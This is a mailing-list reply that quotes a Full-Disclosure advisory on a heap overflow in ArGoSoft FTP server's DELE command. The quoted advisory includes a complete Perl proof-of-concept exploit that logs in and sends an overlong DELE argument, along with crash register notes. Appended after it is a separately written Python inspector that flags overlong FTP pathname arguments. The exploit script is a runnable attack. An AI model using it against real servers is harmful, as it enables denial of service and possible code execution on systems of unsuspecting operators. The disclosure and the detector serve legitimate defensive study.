you forgot to message the programmer of it before the public /slap on you ;->

Jerome Athias wrote:
> -- Title: ArGoSoft FTP server remote heap overflow
>
> -- Affected Products: ArGoSoft FTP server 1.4.3.5 (current) and prior
>
> -- Affected Vendor: ArGoSoft - http://www.argosoft.com
>
> -- Impact: DoS, Arbitrary Code Execution
>
> -- Where: From remote
>
> -- Type: Heap Overflow
>
> -- Vulnerability Details: A remote attacker with valid credentials
> is able to trigger a heap overwrite in ArgoSoft FTP server. The bug
> occurs by providing a long argument to the DELE command. This
> vulnerability can allow remote attackers to execute arbitrary code
> or launch a denial of service attack.
>
> -- Credit: This vulnerability was discovered by Jerome Athias.
> https://www.securinfos.info/english/
>
>
> #!/usr/bin/perl
>
> # ---------------------------------------------------- #
> # ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server #
> # Jerome Athias                                        #
> # ---------------------------------------------------- #
>
> use Net::FTP;
>
> # geting data
> $host = @ARGV[0];
> $port = @ARGV[1];
> $debug = @ARGV[2];
> $user = @ARGV[3];
> $pass = @ARGV[4];
>
> # ===========
>
> if (($host) && ($port)) {
>
>     # make exploit string
>     $exploit_string = "DELE ";
>     $exploit_string .= "A" x 2041;
>     $exploit_string .= "B" x 4;
>     $exploit_string .= "C" x 1026;
>
>     # On Win2K SP4 FR:
>     # EAX 42424241
>     # ECX 43434343
>     # EDX 43434342
>     # EBX 43434B73
>
>     # ===================
>
>     print "Trying to connect to $host:$port\n";
>     $sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug=> $debug) or die "[-] Connection failed\n";
>     print "[+] Connect OK!\n";
>     print "Logging...\n";
>     if (!$user) {
>         $user = "test";
>         $pass = "test";
>     }
>     $sock->login($user, $pass);
>     $answer = $sock->message;
>     print "Sending string...\n";
>     $sock->quot($exploit_string);
> } else {
>     print "ArgoSoft FTP Server - PoC Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port username password [debug: 1 or 0]\n\n";
> }
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
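
A defensive counterpart to the advisory quoted above, added here as an example and not part of the original thread or of any ArGoSoft code: an FTP control-channel inspector that flags pathname commands (DELE included) whose argument exceeds a length limit, and records whether the session had logged in, since the advisory says valid credentials are required. The 512-byte limit, the (session, direction, line) record format and all names are assumptions; the sample traffic is constructed.

```python
import re
from collections import defaultdict

MAX_ARG_LEN = 512  # assumed policy limit, not a value from the advisory
# Commands that take a pathname argument (RFC 959 and common extensions).
PATH_COMMANDS = {"DELE", "RETR", "STOR", "APPE", "CWD", "MKD", "RMD",
                 "RNFR", "RNTO", "LIST", "NLST", "SIZE"}
REPLY_CODE = re.compile(rb"^(\d{3})[ -]")


def inspect(records, max_arg_len=MAX_ARG_LEN):
    """Return alerts for path commands carrying an overlong argument.

    records: iterable of (session_id, direction, raw_line); direction is
    "C" for client-to-server and "S" for server-to-client.
    """
    logged_in = defaultdict(bool)
    alerts = []
    for sid, direction, raw in records:
        line = raw.rstrip(b"\r\n")
        if direction == "S":
            m = REPLY_CODE.match(line)
            if m and m.group(1) == b"230":  # 230 = user logged in
                logged_in[sid] = True
            continue
        verb, _, arg = line.partition(b" ")
        verb = verb.decode("latin-1").upper()  # FTP verbs are case-insensitive
        if verb in PATH_COMMANDS and len(arg) > max_arg_len:
            alerts.append({
                "session": sid,
                "command": verb,
                "arg_len": len(arg),
                "authenticated": logged_in[sid],
                # Filler-style arguments use very few distinct byte values.
                "distinct_bytes": len(set(arg)),
            })
    return alerts


# Constructed sample traffic (not captured from a real server).
SAMPLE = [
    ("s1", "C", b"USER alice\r\n"), ("s1", "S", b"331 Password required\r\n"),
    ("s1", "C", b"PASS ***\r\n"), ("s1", "S", b"230 User logged in\r\n"),
    ("s1", "C", b"DELE reports/old.txt\r\n"),
    ("s2", "C", b"USER bob\r\n"), ("s2", "S", b"331 Password required\r\n"),
    ("s2", "C", b"PASS ***\r\n"), ("s2", "S", b"230 User logged in\r\n"),
    ("s2", "C", b"dele " + b"x" * 3000 + b"\r\n"),
    ("s3", "C", b"DELE " + b"y" * 600 + b"\r\n"),
]
```

Running `inspect(SAMPLE)` yields two alerts: the authenticated 3000-byte DELE on session s2 and the unauthenticated 600-byte one on s3, while the ordinary DELE on s1 passes.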
